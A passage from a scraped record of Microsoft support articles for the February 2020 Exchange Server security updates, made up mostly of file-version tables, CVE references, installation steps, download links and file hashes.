4.3.487.0</td><td>81,616</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.protectedservicehost.exe</td><td>14.3.487.0</td><td>32,464</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.provisioningagent.dll</td><td>14.3.487.0</td><td>192,208</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.pst.dll</td><td>14.3.470.0</td><td>179,848</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.routingtablelogparser.dll</td><td>14.3.470.0</td><td>110,216</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpc.dll</td><td>14.3.470.0</td><td>873,672</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.coexistence.dll</td><td>14.3.470.0</td><td>24,200</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.dll</td><td>14.3.487.0</td><td>126,672</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.exmonhandler.dll</td><td>14.3.470.0</td><td>73,344</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.handler.dll</td><td>14.3.487.0</td><td>437,968</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.parser.dll</td><td>14.3.470.0</td><td>601,736</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.server.dll</td><td>14.3.487.0</td><td>110,504</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.service.eventlog.dll</td><td>14.3.470.0</td><td>23,472</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.service.exe</td><td>14.3.487.0</td><td>89,808</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcoverhttpautoconfig.dll</td><td>14.3.487.0</td><td>65,
232</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcoverhttpautoconfig.eventlog.dll</td><td>14.3.470.0</td><td>29,104</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.saclwatcher.eventlog.dll</td><td>14.3.470.0</td><td>20,912</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.saclwatcherservicelet.dll</td><td>14.3.470.0</td><td>26,976</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.exsearch.exe</td><td>14.3.487.0</td><td>417,488</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.exsearchmsg.dll</td><td>14.3.470.0</td><td>27,568</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.search.native.dll</td><td>14.3.470.0</td><td>138,440</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.security.dll</td><td>14.3.487.0</td><td>192,208</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.servicehost.eventlog.dll</td><td>14.3.470.0</td><td>20,400</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.servicehost.exe</td><td>14.3.487.0</td><td>35,752</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.dll</td><td>14.3.487.0</td><td>3,145,424</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.eventlogs.dll</td><td>14.3.470.0</td><td>32,688</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.setup.acquirelanguagepack.dll</td><td>14.3.470.0</td><td>52,872</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.common.dll</td><td>14.3.470.0</td><td>454,280</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.exsetupuihelper.dll</td><td>14.3.470.0</td><td>216,712</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr
><tr><td>Microsoft.exchange.setup.signverfwrapper.dll</td><td>14.3.470.0</td><td>74,376</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.sqm.dll</td><td>14.3.470.0</td><td>65,224</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.storedriver.dll</td><td>14.3.487.0</td><td>556,752</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.storedriver.eventlog.dll</td><td>14.3.470.0</td><td>23,472</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.storeprovider.dll</td><td>14.3.470.0</td><td>859,784</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.structuredquery.dll</td><td>14.3.470.0</td><td>159,944</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.agent.antispam.common.dll</td><td>14.3.470.0</td><td>77,448</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.contentfilter.cominterop.dll</td><td>14.3.470.0</td><td>29,320</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.headerconversion.dll</td><td>14.3.470.0</td><td>26,248</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.hygiene.dll</td><td>14.3.470.0</td><td>233,096</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.liveidauth.dll</td><td>14.3.470.0</td><td>23,680</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.prioritization.dll</td><td>14.3.470.0</td><td>44,680</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.protocolanalysis.dbaccess.dll</td><td>14.3.470.0</td><td>65,160</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.senderid.core.dll</td><td>14.3.470.0</td><td>73,352</td><td>03-Jan-2020</
td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.trustedmailagents.dll</td><td>14.3.487.0</td><td>57,040</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.dll</td><td>14.3.487.0</td><td>1,916,624</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.eventlog.dll</td><td>14.3.470.0</td><td>104,368</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.logging.search.dll</td><td>14.3.470.0</td><td>102,024</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.common.dll</td><td>14.3.487.0</td><td>442,064</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.common.eventlog.dll</td><td>14.3.470.0</td><td>18,888</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.sync.worker.dll</td><td>14.3.487.0</td><td>1,072,848</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.worker.eventlog.dll</td><td>14.3.470.0</td><td>21,936</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.transportlogsearch.eventlog.dll</td><td>14.3.470.0</td><td>27,568</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.um.clientstrings.dll</td><td>14.3.470.0</td><td>77,448</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.lad.dll</td><td>14.3.470.0</td><td>123,528</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.um.prompts.dll</td><td>14.3.470.0</td><td>212,616</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.troubleshootingtool.shared.dll</td><td>14.3.470.0</td><td>102,024</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.ucmaplatform.dll</td><td>14.3.487.0</td><td>188,112</td><td>03-Jan-2020</td><
td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umcommon.dll</td><td>14.3.487.0</td><td>765,856</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umcore.dll</td><td>14.3.487.0</td><td>1,384,144</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedmessaging.eventlog.dll</td><td>14.3.470.0</td><td>108,976</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.managementgui.dll</td><td>14.3.470.0</td><td>155,336</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.powershell.hostingtools.dll</td><td>14.3.470.0</td><td>89,800</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.powershell.hostingtools_2.dll</td><td>14.3.470.0</td><td>89,800</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Migbase.dll</td><td>14.3.470.0</td><td>783,792</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Migmsg.dll</td><td>14.3.470.0</td><td>91,560</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Migrateumcustomprompts.ps1</td><td>Not applicable</td><td>16,986</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Moveallreplicas.ps1</td><td>Not applicable</td><td>13,043</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Movemailbox.ps1</td><td>Not applicable</td><td>56,868</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Movetransportdatabase.ps1</td><td>Not applicable</td><td>28,466</td><td>03-Jan-2020</td><td>05:47</td><td>Not 
applicable</td></tr><tr><td>Msallog.dll</td><td>14.3.470.0</td><td>46,504</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Msexchangeadtopologyservice.exe</td><td>14.3.470.0</td><td>114,096</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Msexchangefds.exe</td><td>14.3.470.0</td><td>110,280</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Msexchangelesearchworker.exe</td><td>14.3.487.0</td><td>89,808</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Msexchangemailboxassistants.exe</td><td>14.3.487.0</td><td>802,512</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Msexchangemailboxreplication.exe</td><td>14.3.470.0</td><td>27,272</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Msexchangemailsubmission.exe</td><td>14.3.487.0</td><td>118,480</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Msexchangerepl.exe</td><td>14.3.487.0</td><td>69,328</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Msexchangethrottling.exe</td><td>14.3.470.0</td><td>48,840</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Msexchangetransport.exe</td><td>14.3.470.0</td><td>81,544</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Msexchangetransportlogsearch.exe</td><td>14.3.487.0</td><td>212,688</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Msfte1.dll</td><td>14.0.7177.5001</td><td>3,228,440</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Msgedt.js</td><td>Not applicable</td><td>4,778</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Msglst.js</td><td>Not applicable</td><td>3,295</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Newtestcasconnectivityuser.ps1</td><td>Not applicable</td><td>20,120</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Newtestcasconnectivityuserhosting.ps1</td><td>Not 
applicable</td><td>22,443</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Ntspxgen.dll</td><td>14.3.470.0</td><td>87,472</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>Oabgen.dll</td><td>14.3.470.0</td><td>356,784</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Ocemul.dll</td><td>8.5.3.76</td><td>54,112</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Oilink.dll</td><td>8.5.3.76</td><td>464,736</td><td>03-Jan-2020</td><td>05:49</td><td>x86</td></tr><tr><td>Oilink.exe</td><td>8.5.3.76</td><td>317,280</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Oilink.jar</td><td>Not applicable</td><td>1,425,202</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Oitnsf.id</td><td>Not applicable</td><td>4,688</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Oit_font_metrics.db</td><td>Not applicable</td><td>375,808</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Oleconverter.exe</td><td>14.3.470.0</td><td>162,736</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Oswin64.dll</td><td>8.5.3.76</td><td>103,272</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Outsidein.dll</td><td>8.5.3.76</td><td>296,296</td><td>03-Jan-2020</td><td>05:49</td><td>x86</td></tr><tr><td>Owaauth.dll</td><td>14.3.470.0</td><td>104,880</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Owasl.xap</td><td>Not applicable</td><td>36,280</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Owasmime.msi</td><td>Not applicable</td><td>2,297,856</td><td>03-Jan-2020</td><td>05:45</td><td>Not applicable</td></tr><tr><td>Owaspell.dll</td><td>14.3.470.0</td><td>50,608</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Perfnm.h</td><td>Not applicable</td><td>47,627</td><td>03-Jan-2020</td><td>05:50</td><td>Not 
applicable</td></tr><tr><td>Perf_common_extrace.dll</td><td>14.3.470.0</td><td>170,416</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Perf_exchmem.dll</td><td>14.3.470.0</td><td>71,600</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Perf_mdbsz.dll</td><td>14.3.470.0</td><td>56,752</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Policytest.exe</td><td>14.3.470.0</td><td>51,632</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Preparemoverequesthosting.ps1</td><td>Not applicable</td><td>68,859</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Prepare_moverequest.ps1</td><td>Not applicable</td><td>69,054</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Publishedstartpage.js</td><td>Not applicable</td><td>15,353</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Quietexe.exe</td><td>14.3.470.0</td><td>21,640</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Readpost.aspx</td><td>Not applicable</td><td>6,516</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Readsharingmessage.ascx</td><td>Not applicable</td><td>5,235</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Readvoicemailmessage.aspx</td><td>Not applicable</td><td>9,320</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Redir.aspx</td><td>Not applicable</td><td>1,714</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Redistributeactivedatabases.ps1</td><td>Not applicable</td><td>114,387</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Reenable_auditloggingagent.ps1</td><td>Not applicable</td><td>12,395</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Reinstalldefaulttransportagents.ps1</td><td>Not 
applicable</td><td>20,402</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Remoteexchange.ps1</td><td>Not applicable</td><td>19,447</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Removereplicafrompfrecursive.ps1</td><td>Not applicable</td><td>13,887</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Removeuserfrompfrecursive.ps1</td><td>Not applicable</td><td>13,191</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Replacereplicaonpfrecursive.ps1</td><td>Not applicable</td><td>14,292</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Replaceuserpermissiononpfrecursive.ps1</td><td>Not applicable</td><td>13,551</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Replaceuserwithuseronpfrecursive.ps1</td><td>Not applicable</td><td>13,547</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Replaycrimsonevents.man</td><td>Not applicable</td><td>247,121</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Replaycrimsonmsg.dll</td><td>14.3.470.0</td><td>266,440</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Resetattachmentfilterentry.ps1</td><td>Not applicable</td><td>13,332</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Resetcasservice.ps1</td><td>Not applicable</td><td>19,563</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Resetsearchindex.ps1</td><td>Not applicable</td><td>14,653</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Reset_antispamupdates.ps1</td><td>Not applicable</td><td>12,017</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Resumemailboxdatabasecopy.ps1</td><td>Not applicable</td><td>15,126</td><td>03-Jan-2020</td><td>05:47</td><td>Not 
applicable</td></tr></tbody></table></div></div></div><h2>How to get help and support for this security update</h2><p>Protect yourself online: <a data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/hub/4099151\" managed-link=\"\" target=\"_blank\">Windows Security support</a></p><p>Learn how we guard 
against cyber threats: <a href=\"https://www.microsoft.com/security\" managed-link=\"\" target=\"_blank\">Microsoft Security</a></p></body></html>", "edition": 4, "modified": "2020-02-13T16:33:55", "id": "KB4536989", "href": "https://support.microsoft.com/en-us/help/4536989/", "published": "2020-02-11T00:00:00", "title": "Description of the security update for Microsoft Exchange Server 2010: February 11, 2020", "type": "mskb", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:48:45", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0688", "CVE-2020-0692"], "description": "<html><body><p>Description of the security update for Microsoft Exchange Server 2019 and 2016: February 11, 2020</p><p>This update rollup is a security update that\u00a0resolves vulnerabilities in Microsoft Exchange Server. To learn more about these vulnerabilities, see the following Common Vulnerabilities and Exposures (CVE):</p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0692\" managed-link=\"\" target=\"_blank\">CVE-2020-0692 | Microsoft Exchange Server Elevation of Privilege Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0688\" managed-link=\"\" target=\"_blank\">CVE-2020-0688 | Microsoft Exchange Memory Corruption Vulnerability</a></li></ul><h2>Known issues in this security update</h2><ul><li><p>When you try to manually install this security update by double-clicking the update file (.msp) to run it in Normal mode\u00a0(that is, not as an administrator), some files are not correctly updated.</p><p>When this issue occurs, you don\u2019t receive an error message or any indication that the security update was not correctly installed. However, Outlook Web Access (OWA) and the Exchange Control Panel (ECP) may stop working.<br/><br/>This issue occurs on servers that are using user account control (UAC). 
The issue occurs because the security update doesn\u2019t correctly stop certain Exchange-related services.</p><p>To avoid this issue, follow these steps to manually install this security update:</p><ol><li>Select <strong>Start</strong>, and type\u00a0<strong>cmd</strong>.</li><li>In the results, right-click <strong>Command Prompt</strong>, and then select <strong>Run as administrator</strong>.</li><li>If the <strong>User Account Control</strong> dialog box appears, verify that the default action is the action that you want, and then select <strong>Continue</strong>.</li><li>Type the full path of the .msp file, and then press Enter.</li></ol><p>This issue does not occur when you install the update through Microsoft Update.</p></li><li><p>Exchange services may remain in a disabled state after you install this security update. This condition does not indicate that the update is not installed correctly. This condition may occur if the service control scripts experience a problem when they try to return Exchange services to their\u00a0usual state.<br/><br/>To fix this issue, use Services Manager to restore the startup type to <strong>Automatic</strong>, and then start the affected Exchange services manually. To avoid this issue, run the security update at an elevated command prompt. For more information about how to open an elevated Command Prompt window, see\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/cc947813(v=ws.10).aspx\" managed-link=\"\" target=\"_blank\">Start a Command Prompt as an Administrator</a>.</p></li></ul><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available through Windows Update. 
When you turn on automatic updating, this update will be downloaded and installed automatically.\u00a0<span><span>For more information about how to turn on automatic updating, see </span></span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/12373/windows-update-faq\" managed-link=\"\" target=\"_blank\">Windows Update: FAQ</a>.</p><h3>Method 2: Microsoft Update Catalog</h3><p>To get the standalone package for this update, go to the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4536987\" managed-link=\"\" target=\"_blank\">Microsoft Update Catalog</a>\u00a0website.</p><h3>Method 3: Microsoft Download Center</h3><p>You can get the standalone update package through the Microsoft Download Center.</p><ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><a data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=6f5e2305-f1dc-4ce9-97c5-4d6fc1b87a24\" managed-link=\"\" target=\"_blank\">Download Security Update For Exchange Server 2019 Cumulative Update 4 (KB4536987)</a></li><li><a data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=dec0d147-8b43-4fee-94cb-ed43ed1226ad\" managed-link=\"\" target=\"_blank\">Download Security Update For Exchange Server 2019 Cumulative Update 3 (KB4536987)</a></li><li><a data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=a4bd9a4e-56f4-42c2-b0d7-fffe52c5dbe5\" managed-link=\"\" target=\"_blank\">Download 
Security Update For Exchange Server 2016 Cumulative Update 15 (KB4536987)</a></li><li><a data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=5ae7346b-f59c-415d-b576-e50f6b493a23\" managed-link=\"\" target=\"_blank\">Download Security Update For Exchange Server 2016 Cumulative Update 14 (KB4536987)</a></li></ul><h2>More information</h2><h3>Security update deployment information</h3><p>For deployment information about this update, see\u00a0<a aria-live=\"rude\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/20200211\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">security update deployment information: February 11, 2020</a>.\u00a0</p><h3>Security update replacement information</h3><p>This security update replaces the following previously released updates:</p><ul><li><a data-content-id=\"4523171\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">Description of the security update for Microsoft Exchange Server 2016, and 2019: November 12, 2019</a></li></ul><h2>File information</h2><h3>File hash information</h3><table class=\"table\"><tbody><tr><th>Update name</th><th>File name</th><th>SHA1 hash</th><th>SHA256 hash</th></tr><tr><td>Exchange Server 2019 Cumulative Update 4</td><td>Exchange2019-KB4536987-x64-en.msp</td><td>F040FFC72F38658BC9B77DF8E368698B70CB825C</td><td>774A68E5B4462A6807B34AACD1ABE36901A31C6B1C7AD0270225A2C0C62B2478</td></tr><tr><td>Exchange Server 2019 Cumulative Update 3</td><td>Exchange2019-KB4536987-x64-en.msp</td><td>F936D367F8AD3F8965BFDDB61FFCFF3BFC107013</td><td>78851F1ECD036A768181F9938CF9CFF79FE3D0BD45A4132A22C3587B7D9379C2</td></tr><tr><td>Exchange Server 2016 Cumulative Update 
15</td><td>Exchange2016-KB4536987-x64-en.msp</td><td>864C4A38668A914A4F75DDF679555CFB8F0D4065</td><td>6DC7F1CEBCDBCA95FE33C2168426B0AC8BD14F31079B12C759A68F35F6FC3352</td></tr><tr><td>Exchange Server 2016 Cumulative Update 14</td><td>Exchange2016-KB4536987-x64-en.msp</td><td>68E8E81FB24045AE4EA18862B744BCF5A2CCAE6E</td><td>68D642697F7BE93E5070DB0B198918C43D6B05BA7FC62D2322A2C6FE8BB9D171</td></tr></tbody></table><h3>Exchange server file information</h3><p>The English (United States) version of this update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.</p><div contenteditable=\"false\" tabindex=\"-1\"><div class=\"faq-section\" data-widget=\"collapsible\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">Exchange Server 2019 Cumulative Update 4</span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th><th>Platform</th></tr><tr><td>Activemonitoringeventmsg.dll</td><td>15.2.529.8</td><td>71,032</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Activemonitoringexecutionlibrary.ps1</td><td>Not applicable</td><td>29,802</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Adduserstopfrecursive.ps1</td><td>Not applicable</td><td>14,925</td><td>01-Jan-2020</td><td>11:21</td><td>Not 
applicable</td></tr><tr><td>Interop.certenroll.dll</td><td>15.2.529.8</td><td>142,928</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Interop.licenseinfointerface.dll</td><td>15.2.529.8</td><td>14,208</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Interop.netfw.dll</td><td>15.2.529.8</td><td>34,384</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Interop.plalibrary.dll</td><td>15.2.529.8</td><td>72,776</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Interop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc</td><td>15.2.529.8</td><td>27,000</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Interop.taskscheduler.dll</td><td>15.2.529.8</td><td>46,672</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Interop.wuapilib.dll</td><td>15.2.529.8</td><td>60,800</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Interop.xenroll.dll</td><td>15.2.529.8</td><td>39,800</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Kerbauth.dll</td><td>15.2.529.8</td><td>63,056</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Licenseinfointerface.dll</td><td>15.2.529.8</td><td>643,448</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Lpversioning.xml</td><td>Not applicable</td><td>19,954</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Mailboxdatabasereseedusingspares.ps1</td><td>Not applicable</td><td>31,900</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Managedavailabilitycrimsonmsg.dll</td><td>15.2.529.8</td><td>138,624</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Managedstorediagnosticfunctions.ps1</td><td>Not applicable</td><td>126,233</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Managescheduledtask.ps1</td><td>Not 